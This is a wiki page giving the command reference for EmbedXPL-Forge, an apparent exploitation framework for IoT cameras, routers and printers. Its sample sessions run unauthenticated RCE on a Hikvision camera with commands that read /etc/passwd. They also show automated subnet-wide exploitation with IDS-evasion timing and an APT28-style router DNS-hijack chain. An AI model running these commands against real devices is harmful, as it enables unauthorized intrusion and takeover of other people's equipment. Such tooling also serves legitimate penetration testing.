Skip to content

CLI Reference

Jump to bottom
André Henrique edited this page Jun 8, 2026 · 1 revision

CLI Reference

Complete reference for all EmbedXPL-Forge interactive shell commands and global options.

Interactive Shell Commands

show modules

List available modules, optionally filtered by type, vendor, or CVE.

Syntax:

show modules [type=<category>] [vendor=<vendor>] [cve=<cve_id>]

Parameters:

Parameter Values Description
type exploits, scanners, creds, payloads, encoders, generic, osint Filter by module category
vendor dlink, hikvision, zte, etc. Filter by vendor name
cve CVE-2021-36260, 2026, etc. Filter by CVE ID or year

Examples:

exf > show modules

Exploit Modules:
  exploits/cameras/hikvision              (22 modules)
  exploits/cameras/dahua                  (19 modules)
  exploits/routers/dlink                  (31 modules)
  exploits/routers/zte                    (12 modules)
  exploits/printers/hp                    (24 modules)
  exploits/firewalls/paloalto             (8 modules)
  ...
Total: 3000+ modules across 114+ vendors

exf > show modules type=scanners

Scanner Modules:
  scanners/autopwn
  scanners/specialized/br_isp_scanner
  scanners/cameras/rtsp_network_scan
  scanners/printers/ipp_discovery
  scanners/ics/modbus_scanner

exf > show modules vendor=hikvision

Hikvision Modules (22):
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/hikvision/info_disclosure_cve_2017_7921
  exploits/cameras/hikvision/snap_bypass_cve_2021_36260
  ...

exf > show modules cve=2026

2026 CVE Modules (31):
  exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983
  exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474
  exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
  ...

use <module_path>

Select a module for configuration and execution.

Syntax:

use <module_path>

Examples:

exf > use exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
exf (Hikvision RCE) >

exf > use creds/routers/multi_http_login
exf (Multi HTTP Login) >

exf > use scanners/autopwn
exf (AutoPwn) >

show options

Display all configurable options for the currently loaded module.

Syntax:

show options

Example output:

exf (Hikvision RCE) > show options

Module: Hikvision CVE-2021-36260 RCE
  Name:      Hikvision IP Camera Unauthenticated RCE
  CVE:       CVE-2021-36260
  CVSS:      9.8 (Critical)
  Author:    EmbedXPL-Forge
  Platform:  Hikvision IP cameras, NVR (firmware < 2.2.15)

Options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  RHOST                      yes       Target IP address or hostname
  RPORT     80               yes       HTTP port (80 or 443 for HTTPS)
  CMD       id               yes       OS command to execute
  TIMEOUT   10               no        Connection timeout in seconds
  HTTPS     false            no        Use HTTPS instead of HTTP
  PROXY                      no        HTTP proxy (e.g., 127.0.0.1:8080)

set <OPTION> <value>

Configure a module option.

Syntax:

set <OPTION> <value>

Examples:

exf (Hikvision RCE) > set RHOST 192.168.1.100
RHOST => 192.168.1.100

exf (Hikvision RCE) > set CMD "id; uname -a; cat /etc/passwd"
CMD => id; uname -a; cat /etc/passwd

exf (Hikvision RCE) > set TIMEOUT 15
TIMEOUT => 15

exf (Hikvision RCE) > set HTTPS true
HTTPS => true

check

Verify whether the target appears to be vulnerable before executing the full exploit. Non-destructive - only probes the target.

Syntax:

check

Example:

exf (Hikvision RCE) > check
[*] Checking 192.168.1.100:80 for CVE-2021-36260...
[*] Sending probe request to /SDK/webLanguage
[+] HTTP 500 returned - endpoint exists and processes PUT requests
[+] Target appears vulnerable (Hikvision, CVE-2021-36260, CVSS 9.8)

exf (DSL2750B RCE) > check
[*] Checking 192.168.1.1:80...
[-] Target returned 403 - may be patched or different firmware version
[-] Target does not appear vulnerable

run

Execute the currently loaded module against the configured target.

Syntax:

run

Example:

exf (Hikvision RCE) > run
[*] Running CVE-2021-36260 against 192.168.1.100:80
[*] Sending exploit payload to /SDK/webLanguage
[+] Command executed successfully
[+] Output:
    uid=0(root) gid=0(root) groups=0(root)
    Linux HiCamera 3.10.0 #1 SMP armv7l
[+] RCE confirmed - target is compromised
[*] Session data saved to ~/.exf_sessions/192.168.1.100

back

Unload the current module and return to the main shell prompt.

Syntax:

back

Example:

exf (Hikvision RCE) > back
exf >

search <keyword>

Search all module names, descriptions, CVEs, and vendor tags.

Syntax:

search <keyword>

Examples:

exf > search hikvision

[*] Searching for: hikvision
Modules found (22):
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/hikvision/info_disclosure_cve_2017_7921
  exploits/cameras/hikvision/magicpack_auth_bypass_cve_2023_28808
  exploits/cameras/hikvision/json_bypass_cve_2021_36260_variant
  ...

exf > search CVE-2026

[*] Searching for: CVE-2026
Modules found (31):
  exploits/cameras/dlink/dcs_932l_light_sensor_rce_cve_2026_36983
  exploits/cameras/dlink/dcs_933l_admin_cmd_inject_cve_2026_2218
  exploits/routers/zte/zxhn_h267n_h268n_dos_cve_2026_34473
  exploits/routers/zte/zxhn_h298a_cred_dump_cve_2026_34474
  exploits/printers/linux/cups_pwn2own_chain_cve_2026_34480
  ...

exf > search rce

[*] Searching for: rce
Modules found (184):
  exploits/routers/dlink/dir_300_600_rce
  exploits/routers/dlink/dsl_2750b_rce
  exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  exploits/cameras/dahua/cctv_rce_cve_2021_33044
  ...

info

Display detailed metadata for the currently loaded module.

Syntax:

info

Example:

exf (Hikvision RCE) > info

Module Information:
  Name:        Hikvision IP Camera CVE-2021-36260 RCE
  Path:        exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  Version:     1.2.0
  CVE:         CVE-2021-36260
  CVSS:        9.8 (Critical)
  CWE:         CWE-78 (OS Command Injection)
  Vendor:      Hikvision
  Type:        Remote Code Execution
  Auth:        None required
  Platform:    Linux (ARM, MIPS)

Affected Products:
  Hikvision IP cameras and NVRs with firmware prior to build 210625
  (hundreds of models from DS-2CD series, DS-7 NVR series, and OEMs)

Description:
  An OS command injection vulnerability in the ISAPI endpoint /SDK/webLanguage
  allows unauthenticated attackers to execute arbitrary commands as root.
  The endpoint processes XML input without sanitizing the lang parameter.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-36260
  https://www.hikvision.com/en/support/cybersecurity/security-advisory/

sessions

Manage persistent host scan history. Sessions record tested modules, findings, and timestamps per host (keyed by SHA-256 of IP+MAC).

Syntax:

sessions list
sessions show <ip>
sessions delete <ip>
sessions export <ip>
sessions purge

Examples:

exf > sessions list

Active Sessions (3 hosts):

  Host           MAC                Vendor     Last Seen            Findings
  ----           ---                ------     ---------            --------
  192.168.1.1    AA:BB:CC:DD:EE:FF  Huawei     2026-06-01 14:22     2 vulnerabilities
  192.168.1.100  11:22:33:44:55:66  Hikvision  2026-06-01 14:35     1 vulnerability
  10.0.0.50      77:88:99:AA:BB:CC  Kapsch     2026-06-01 15:00     0 (assessment only)

exf > sessions show 192.168.1.100

Session: 192.168.1.100
  MAC Address  : 11:22:33:44:55:66
  Vendor       : Hikvision
  Open Ports   : 80, 443, 554, 37777
  First Seen   : 2026-06-01 14:30:00
  Last Updated : 2026-06-01 14:35:22

Findings:
  [+] CVE-2021-36260 (RCE, CVSS 9.8) - CONFIRMED VULNERABLE
      Module: exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
      Timestamp: 2026-06-01 14:35:22
      Output: uid=0(root)

Tested (no finding):
  [-] CVE-2017-7921 (Auth Bypass) - not vulnerable (patched)

exf > sessions export 192.168.1.100

[*] Session exported to: ~/.exf_sessions/192.168.1.100_20260601.json

autopwn

Automatically scan a subnet, fingerprint all hosts, select matching modules, and attempt exploitation.

Syntax:

exf > use scanners/autopwn
exf (AutoPwn) > set target <ip_or_cidr>
exf (AutoPwn) > run

Example:

exf > use scanners/autopwn
exf (AutoPwn) > set target 192.168.1.0/24
exf (AutoPwn) > set TIMING T3
exf (AutoPwn) > run

[*] AutoPwn starting on 192.168.1.0/24 (T3 - normal)
[*] Phase 1/3: Host discovery (ARP + Nmap)...
[+] 192.168.1.1   Huawei    70:4E:6B:xx:xx  ports: 80,8080,49652  - 11 modules
[+] 192.168.1.100 Hikvision 11:22:33:xx:xx  ports: 80,443,554     -  8 modules
[+] 192.168.1.101 Dahua     AA:BB:CC:xx:xx  ports: 80,37777        -  7 modules
[*] Phase 2/3: Module matching complete (26 modules selected)
[*] Phase 3/3: Executing modules...

[192.168.1.100] exploits/cameras/hikvision/rtsp_rce_cve_2021_36260
  [+] VULNERABLE - uid=0(root)

[192.168.1.101] exploits/cameras/dahua/cctv_auth_bypass_cve_2021_33044
  [+] VULNERABLE - digest bypass confirmed

AutoPwn complete: 2/3 hosts compromised | 3 vulnerabilities found

discover [subnet]

Scan the local network (or a specified subnet) for live hosts, fingerprint devices, and suggest relevant modules.

Syntax:

discover [<subnet_cidr>] [--timing T0-T5] [--fresh]

Examples:

exf > discover
[*] Auto-detecting subnet from active interfaces...
[*] Scanning 192.168.1.0/24 (T3 - normal)...
[+] 192.168.1.1   Huawei    EG8145V5  ports: 80,49652  - 15 modules available
[+] 192.168.1.5   D-Link    DIR-615   ports: 80         -  3 modules available
[+] 192.168.1.100 Hikvision DS-2CD2   ports: 80,554     -  8 modules available

exf > discover 10.0.0.0/24 --timing T1
[*] Scanning 10.0.0.0/24 (T1 - sneaky)...

exf > discover 192.168.1.0/24 --fresh
[*] Fresh scan - ignoring previous session history

Timing profiles:

Profile Delay Use case
T0 300s (paranoid) IDS evasion
T1 15s (sneaky) Quiet audits
T2 2s (polite) Minimal impact
T3 0.5s (normal) Default
T4 0.1s (aggressive) Fast LAN scans
T5 0s (insane) CTF / lab only

apt

Browse and execute APT group attack chains. Chains reproduce known nation-state attack sequences with MITRE ATT&CK mapping.

Syntax:

apt list
apt show <group_name>
apt search <keyword>
apt run <group_name> [attack_index]

Examples:

exf > apt list

Cataloged Threat Actors (8 groups):

  Group     | Origin | Primary Targets        | Modules
  -----     | ------ | ---------------        | -------
  APT28     | RU/GRU | TP-Link, MikroTik      | 4 attacks
  Volt Typhoon | CN  | Fortinet, Cisco, SOHO  | 6 attacks
  Sandworm  | RU/GRU | ICS/OT, GPON           | 3 attacks
  Quad7     | CN     | SOHO routers (BotNet)  | 3 attacks
  Turla     | RU/FSB | Satellite, VSAT        | 2 attacks
  APT40     | CN/MSS | Maritime, IoT          | 4 attacks
  Lazarus   | KP     | Financial, IoT pivot   | 2 attacks
  Hafnium   | CN     | Exchange, SOHO pivots  | 2 attacks

exf > apt show apt28

APT28 (Fancy Bear / GRU Unit 26165)
  MITRE ATT&CK: https://attack.mitre.org/groups/G0007/
  Known CVEs:   CVE-2023-1389, CVE-2018-14847

  Attack Chains:
    [0] TP-Link Archer DNS Hijack (CVE-2023-1389)
    [1] MikroTik Chimay Red (CVE-2018-14847)
    [2] MikroTik RouterOS Credential Exfil
    [3] Mass router botnet - combined chain

exf > apt run apt28 0
[*] Executing APT28 Attack Chain #0: TP-Link Archer DNS Hijack
[*] Step 1/3: Exploit CVE-2023-1389 (auth bypass via tmLanguage)...
[+] Authentication bypassed
[*] Step 2/3: Inject DNS hijack payload...
[+] DNS server overwritten: 8.8.8.8 -> 1.2.3.4
[*] Step 3/3: Persist configuration...
[+] Chain complete - router DNS hijacked

Global Options

These options can be set at the shell level and apply to all modules unless overridden.

Option Default Description
LOGLEVEL info Logging verbosity: debug, info, warn, error
TIMEOUT 10 Default connection timeout (seconds)
THREADS 4 Concurrent threads for scanning/bruteforce
PROXY (none) HTTP proxy for all requests (e.g., 127.0.0.1:8080)
OUTPUT (none) Save all findings to file (JSON or TXT)
SIMULATE false Dry-run mode - probe without executing destructive actions

Setting global options:

exf > set LOGLEVEL debug
LOGLEVEL => debug

exf > set TIMEOUT 20
TIMEOUT => 20

exf > set PROXY 127.0.0.1:8080
PROXY => 127.0.0.1:8080

exf > set OUTPUT /tmp/findings.json
OUTPUT => /tmp/findings.json

Non-Interactive Mode (CLI Flags)

Run modules directly without entering the interactive shell.

Syntax:

embedxpl -m <module_path> -s <option> <value> [-s <option> <value> ...]

Examples:

# Run a specific module
embedxpl -m exploits/cameras/hikvision/rtsp_rce_cve_2021_36260 -s RHOST 192.168.1.100

# Network discovery
embedxpl -c "discover 192.168.1.0/24"

# RTSP camera scan
embedxpl -m exploits/cameras/multi/rtsp_cameradar_attack -s target 192.168.1.0/24

# AutoPwn on a subnet
embedxpl -m scanners/autopwn -s target 192.168.1.0/24

# Output results to file
embedxpl -m exploits/cameras/hikvision/rtsp_rce_cve_2021_36260 -s RHOST 192.168.1.100 -o results.json

Available flags:

Flag Description
-m <module> Module path to run
-s <option> <value> Set a module option (repeatable)
-c "<command>" Execute a shell command
-o <file> Output results to JSON file
--version Print version and exit
--list-modules Print all module paths and exit

Home | Quick Start | Exploit Modules

EmbedXPL-Forge v3.2.1 | GitHub | PyPI | Issues

pip install embedxpl | pip install firewallxpl | pip install printerxpl-forge | pip install wirelessxpl | pip install mikrotikapi-bf

EmbedXPL-Forge v3.4.0

Home | Home-pt-BR

English (en-US)

Getting Started

Modules

Shell & Post-Exploitation

Tools & Infrastructure

Reference

Portugues (pt-BR)

Comecar

Modulos

Shell e Pos-Exploracao

Ferramentas e Infraestrutura

Referencia

Clone this wiki locally